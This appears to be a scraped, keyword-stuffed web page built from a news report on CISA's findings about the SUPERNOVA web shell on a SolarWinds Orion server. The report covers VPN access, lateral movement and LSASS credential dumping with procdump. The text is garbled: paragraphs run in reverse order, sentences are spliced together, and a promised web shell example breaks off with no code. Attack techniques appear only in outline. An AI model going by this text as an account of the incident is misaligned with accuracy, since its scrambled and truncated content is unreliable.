- #SOLARWINDS ORION PLATFORM SOFTWARE#
- #SOLARWINDS ORION PLATFORM CODE#
- #SOLARWINDS ORION PLATFORM PASSWORD#
#SOLARWINDS ORION PLATFORM PASSWORD#
![solarwinds orion platform solarwinds orion platform](https://s4.itho.me/sites/default/files/styles/picture_size_small/public/field/image/0113-solarwinds_attack_timeline.jpg)
![solarwinds orion platform solarwinds orion platform](https://www.rtoinsider.com/ext/resources/ero/wp-content/uploads/sites/2/SolarWinds-Orion-platform-SolarWinds-Alt-FI.jpg)
The attacker put a renamed copy of procdump.exe on the SolarWinds Orion server to dump the LSASS memory. So, either the threat actor was able to change or bypass that property, or the victim mistakenly marked the private key certificate as exportable. The cached credentials are normally protected by encryption unless they are marked as exportable. By dumping Local Security Authority Subsystem Service (LSASS) memory.Cached credentials used by the SolarWinds appliance server and network monitoring.CISA reports that the threat actor was able to dump credentials from the SolarWinds appliance via two methods: The goal of the operation looks to have been to gather even more credentials.
#SOLARWINDS ORION PLATFORM CODE#
The injected code is compiled and directly executed in memory.
#SOLARWINDS ORION PLATFORM SOFTWARE#
It enables remote injection of C# source code into a web portal provided by the SolarWinds software suite. It is initially installed by a PowerShell script and hides in a malicious version of the SolarWinds Orion Web Application module. NET rather than PHP, but it is essentially no different. The SUPERNOVA web shell is more sophisticated, and written in. A minimal web shell can be as simple as this: Ī shell like this will site on a compromised server and simply execute whatever command an attacker sends it via a web URL. Web shells are usually small scripts that act as a backdoor or a first point of entry for an attacker. The attacker(s) authenticated to the VPN appliance through several user accounts that did not have multi-factor authentication (MFA) enabled and were able to masquerade as legitimate teleworking employees.įrom there they moved laterally to its SolarWinds Orion server to establish a backdoor that would allow them to persist, so they could connect even if their initial point of entry was closed. CISA reports that it “does not know how the threat actor initially obtained these credentials” but, by coincidence, just two days ago we detailed multiple Pulse Secure vulnerabilities that are being actively exploited in the wild, and which could leverage such an attack. According to its investigation, the threat actor connected to the entity’s network via a Pulse Secure Virtual Private Network (VPN) appliance. Pulse Secure VPNĬISA found that the attacker(s) had access to the enterprise’s network for nearly a year, between March 2020 and February 2021. The threat actors are believed to be different from the ones behind the infamous supply chain attack. So, SUPERNOVA is placed by a lateral movement inside a network and not considered as a part of the SolarWinds supply chain attack.
![solarwinds orion platform solarwinds orion platform](https://cdn.vidyard.com/thumbnails/4866758/vgvdv4LwvwYkE9RgpTIXfQ.png)
The SUPERNOVA web shell is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to appear as part of the SolarWinds Orion monitoring product.
![solarwinds orion platform solarwinds orion platform](https://www.bleepstatic.com/content/hl-images/2020/12/15/SolarWinds--headpic.jpg)
In its analysis, the organization warns that this threat actor behind the compromise “targeted multiple entities in the same period”. These observations were made during an incident response to an Advanced Persistent Threat (APT) actor’s year-long compromise of an enterprise network. The Cybersecurity and Infrastructure Security Agency (CISA) has reported finding the SUPERNOVA web shell collecting credentials on a SolarWinds Orion server.